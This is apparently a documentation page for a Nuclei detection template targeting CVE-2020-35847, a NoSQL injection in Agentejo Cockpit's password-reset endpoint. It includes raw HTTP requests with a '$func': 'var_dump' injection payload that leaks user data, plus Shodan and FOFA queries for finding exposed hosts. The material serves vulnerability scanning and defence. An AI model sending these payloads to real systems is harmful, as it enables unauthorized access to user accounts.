Agentejo Cockpit <0.11.2 - NoSQL Injection
ID: CVE-2020-35847
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
Description
Section titled “Description”Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
YAML Source
Section titled “YAML Source”id: CVE-2020-35847
info: name: Agentejo Cockpit <0.11.2 - NoSQL Injection author: dwisiswant0 severity: critical description: | Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service. remediation: | Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability. reference: - https://swarm.ptsecurity.com/rce-cockpit-cms/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35847 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 epss-score: 0.79056 epss-percentile: 0.98269 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: agentejo product: cockpit shodan-query: - http.favicon.hash:688609340 - http.html:"cockpit" fofa-query: - icon_hash=688609340 - body="cockpit" tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo
http: - raw: - | POST /auth/requestreset HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{ "user": { "$func": "var_dump" } } - | POST /auth/requestreset HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{ "user": { "$func": "nonexistent_function" } }
matchers-condition: and matchers: - type: regex part: body_1 regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'
- type: regex part: body_1 negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"'
- type: regex part: body_2 negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'# digest: 4b0a00483046022100f9c5b4d4b5aa2424d009f47c9714facdcd7aaaa2ac73efec7f59c8e77ac48600022100b5075893b3e6d313a4b0049c92912ce16b4690b7ef85e73c47e5e96912f82249:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35847.yaml"